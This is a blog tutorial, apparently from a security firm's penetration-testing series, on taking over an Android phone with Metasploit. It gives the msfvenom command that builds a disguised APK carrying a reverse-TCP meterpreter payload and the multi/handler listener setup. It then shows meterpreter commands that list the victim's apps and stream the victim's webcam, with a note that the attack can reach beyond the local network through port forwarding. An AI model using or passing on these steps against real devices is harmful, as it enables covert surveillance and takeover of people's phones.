BASIC ANDROID HACKING

welcome you all for the series of blogs on android penetration testing .Today we will look for How To hack any android Device . There are some techniques that we can really hack any android device. So Today we will Learn How Metasploit framework help us to hack any android device. This Content is Exclusively for educational purposes Don’t use this technique for illegal activities.

Setup Required:

System with Windows/ Linux/ Mac OS

Metasploit framework

Android Device

We do this in our local environment for now, we can also do globally by port forwarding technique

How we can hack any Android mobile device using MSFvenom and Metasploit framework. Here, we will use MSFvenom for generating payload apk file and setup listener to Metasploit framework which manipulate Us and we can access victim device

For those who don’t know what is metasploit Metasploit is a penetration testing framework that makes hacking simple. It’s an essential tool for many attackers and defenders. Point Metasploit at your target, pick an exploit, what payload to drop, and hit Enter.

Now, We will first creating a malicious apk file using MSFvenon which help us to access and get control any one device, Lets Do,

For making malicious apk file we will use command:

→ msfvenom -p android/meterpreter/reverse_tcp LHOST=Yourserverip LPORT=setport4444 R> Myfake.apk

As above Picture Now we have successfully created our payload for shell execute

Here -p Refer as payload always make sure set Your local Host Server IP.Now, open Metasploit framework by typing command

→ msfconsole

Now we have successfully launch metasploit frame work You can also open it by manually it default with Kali Linux

Now, Here we will use metasploit msf console that exploits and contains various modules for android device , Now we will setup Listener we will use multi/handler for exploit by typing command:

→ use exploit/multi/handler

Now, we need to set meterpreter/reverse_tcp which generate deep Listener here we will use command:

→ set payload android/meterpreter/reverse_tcp

then we need to set LHOST to find lhost type ifconfig on your terminal ,

Here we will set lhost by typing command:

→ set LHOST

Then set LPORT By typing command:

→ set LPORT 4444

Now till here we have setup our malicious apk now it ready to send your victim and you can manipulate user device into your msfconsole session

Now, Turn For Another Step Now Install Application that we have created Using msfvenonm

Victim Device

Now As above Picture we have installed malicious application that we have created Now,

Now, navigate to your msf console And to gaining access Victim Device by typing command:

→ exploit

As above picture we have successfully able to gaining access Our target Android Device Now, we have Successfully Stared meterpreter session.

Now, Use help command to see the functionality

help

Now, Check for all the application available On Our target android device here it will show all application packages , application name which inside on Our target android device

here we will use command:

→ app_list

Now, We can access Victim camera By Typing command :

→ webcam_list

As above picture We can access victim Camera By msfconsole to access victim webcam stream we will use command:

→ webcam_stream

As above picture Victim Webcam Live stream will Open Up on Our browser If victim running Webcam stream .

So we have successfully access control Our target Device using metasploit framework.

Download Metasploit : https://www.metasploit.com/

Stick with our Blog series to learn more.

For more interesting topics please visit https://securiumsolutions.com/blog/

Our You tube channel : https://www.youtube.com/channel/UC-PEkJHE66uWpFf9nEq1nRA

Author: Pallab Jyoti Borah , VAPT Security Analyst

ThankYou

Leave a Comment

Your email address will not be published. Required fields are marked *